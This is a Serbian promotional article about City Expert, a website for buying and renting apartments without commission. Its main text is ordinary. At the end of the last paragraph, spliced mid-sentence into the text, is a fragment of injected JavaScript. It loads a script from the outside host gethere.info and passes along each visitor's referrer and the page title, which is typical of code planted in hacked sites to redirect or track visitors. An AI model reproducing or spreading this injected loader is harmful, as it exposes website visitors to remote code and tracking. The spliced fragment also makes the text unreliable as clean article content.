CITY EXPERT: Lako do stana bez provizije

CITY EXPERT: Lako do stana bez provizije


Ko želi da kupi ili proda nekretninu, to u kompaniji City Expert može da uradi preko web sajta

Kako se u Srbiji sve više popularizuje preduzetništvo, uvezivanje zanimanja i dobra biznis ideja su samo preduslovi za dobar početak uspešnog poslovanja. Kompanija City Expert je pokrenula inovativan način u posredovanju pri prodaji i izdavanju nekretnina. Osobe koje žele da kupe ili iznajme nekretninu, to mogu učiniti putem web sajta.

CE Call Centar

Era digitalne komunikacije nameće dinamičan tempo života. Prema poslednjim istraživanjima, internet u Srbiji koristi više od 4 miliona građana, tj. 55% stanovništva. Šest mladih osnivača ove kompanije su se dosetili da naprave web sajt sa najpreglednijom ponudom stanova na tržištu.

Osoba koja traži stan prvo može da pogleda nekretninu preko kvalitetnog videa koji se nalazi na sajtu, a koji stvara osećaj kao da se već tamo nalazite. Na sajtu se, takođe, može informisati o prosečnoj visini troškova i komunalija i pogledati celokupan enterijer.

Web sajt http://www.cityexpert.rs/ služi za iznajmljivanje i kupovinu nekretnina bez provizije, a cene i uslovi postavljaju se od strane vlasnika.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

1 comment

Dodajte komentar

+ Ostavite komentar